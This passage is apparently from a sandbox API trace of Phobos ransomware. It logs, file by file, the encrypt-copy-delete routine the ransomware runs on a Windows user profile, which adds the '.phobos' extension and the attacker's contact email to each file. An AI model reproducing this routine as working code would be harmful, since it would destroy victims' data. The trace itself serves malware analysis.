returned 1 [0194.914] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\desktop.ini")) returned 0x6 [0194.914] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0194.915] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0194.915] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0194.915] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0194.915] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0194.915] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ae8) returned 1 [0194.915] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0194.915] ReadFile (in: hFile=0x178, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xae, lpOverlapped=0x0) returned 1 [0194.915] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xb0, dwBufLen=0xb0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xb0) returned 1 [0194.915] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xb0, lpOverlapped=0x0) returned 1 [0194.916] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0194.916] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0194.916] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0194.916] CryptDestroyKey (hKey=0xa32d28) returned 1 [0194.916] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0194.916] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0194.916] CloseHandle (hObject=0x178) returned 1 [0194.917] CloseHandle (hObject=0x194) returned 1 [0194.917] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\desktop.ini")) returned 1 [0194.917] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0194.917] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\themes\\transcodedwallpaper.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0194.918] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=642987) returned 1 [0194.918] CloseHandle (hObject=0x194) returned 1 [0194.918] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\themes\\transcodedwallpaper.jpg")) returned 0x80 [0194.918] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\themes\\transcodedwallpaper.jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0194.918] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\themes\\transcodedwallpaper.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0194.918] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0194.918] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0194.918] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\themes\\transcodedwallpaper.jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0194.919] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ae8) returned 1 [0194.919] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0194.919] ReadFile (in: hFile=0x194, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x9cfab, lpOverlapped=0x0) returned 1 [0194.922] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x9cfb0, dwBufLen=0x9cfb0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x9cfb0) returned 1 [0194.927] WriteFile (in: hFile=0x178, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x9cfb0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x9cfb0, lpOverlapped=0x0) returned 1 [0194.937] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0194.937] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0194.937] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0194.937] CryptDestroyKey (hKey=0xa32d28) returned 1 [0194.937] WriteFile (in: hFile=0x178, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0194.937] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0194.937] CloseHandle (hObject=0x194) returned 1 [0194.937] CloseHandle (hObject=0x178) returned 1 [0194.937] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\themes\\transcodedwallpaper.jpg")) returned 1 [0194.943] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0194.943] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\addons.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\addons.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0194.943] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=24) returned 1 [0194.944] CloseHandle (hObject=0x178) returned 1 [0194.944] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\addons.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\addons.json")) returned 0x2020 [0194.944] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\addons.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\addons.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0194.944] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\addons.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\addons.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0194.944] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0194.944] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0194.944] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\addons.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\addons.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0194.945] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ae8) returned 1 [0194.945] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0194.945] ReadFile (in: hFile=0x178, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x18, lpOverlapped=0x0) returned 1 [0195.182] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x20, dwBufLen=0x20 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x20) returned 1 [0195.182] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x20, lpOverlapped=0x0) returned 1 [0195.183] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32a28) returned 1 [0195.183] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0195.183] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0195.183] CryptDestroyKey (hKey=0xa32a28) returned 1 [0195.183] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0195.183] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0195.183] CloseHandle (hObject=0x178) returned 1 [0195.183] CloseHandle (hObject=0x194) returned 1 [0195.183] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\addons.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\addons.json")) returned 1 [0195.184] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0195.184] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\marionette.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\marionette.log"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0195.184] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=57) returned 1 [0195.184] CloseHandle (hObject=0x194) returned 1 [0195.185] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\marionette.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\marionette.log")) returned 0x2020 [0195.185] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\marionette.log.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\marionette.log.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0195.185] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\marionette.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\marionette.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0195.185] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0195.185] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0195.185] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\marionette.log.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\marionette.log.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0195.266] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0195.266] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0195.266] ReadFile (in: hFile=0x194, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x39, lpOverlapped=0x0) returned 1 [0195.267] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0195.267] WriteFile (in: hFile=0xb8, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x40, lpOverlapped=0x0) returned 1 [0195.268] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32de8) returned 1 [0195.268] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0195.268] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0195.268] CryptDestroyKey (hKey=0xa32de8) returned 1 [0195.268] WriteFile (in: hFile=0xb8, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0195.268] CryptDestroyKey (hKey=0xa327e8) returned 1 [0195.268] CloseHandle (hObject=0x194) returned 1 [0195.268] CloseHandle (hObject=0xb8) returned 1 [0195.268] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\marionette.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\marionette.log")) returned 1 [0195.269] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0195.269] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\pluginreg.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\pluginreg.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0195.270] GetFileSizeEx (in: hFile=0xb8, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=3604) returned 1 [0195.270] CloseHandle (hObject=0xb8) returned 1 [0195.270] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\pluginreg.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\pluginreg.dat")) returned 0x2020 [0195.270] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\pluginreg.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\pluginreg.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0195.270] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\pluginreg.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\pluginreg.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0195.270] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0195.270] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0195.270] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\pluginreg.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\pluginreg.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0195.271] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0195.271] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0195.271] ReadFile (in: hFile=0xb8, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xe14, lpOverlapped=0x0) returned 1 [0195.438] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe20, dwBufLen=0xe20 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe20) returned 1 [0195.438] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xe20, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xe20, lpOverlapped=0x0) returned 1 [0195.438] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32c28) returned 1 [0195.439] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0195.439] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0195.439] CryptDestroyKey (hKey=0xa32c28) returned 1 [0195.439] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0195.439] CryptDestroyKey (hKey=0xa327e8) returned 1 [0195.439] CloseHandle (hObject=0xb8) returned 1 [0195.439] CloseHandle (hObject=0x194) returned 1 [0195.439] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\pluginreg.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\pluginreg.dat")) returned 1 [0195.440] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0195.440] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\prefs.js" (normalized: "c:\\users\\5p5nrgjn0js 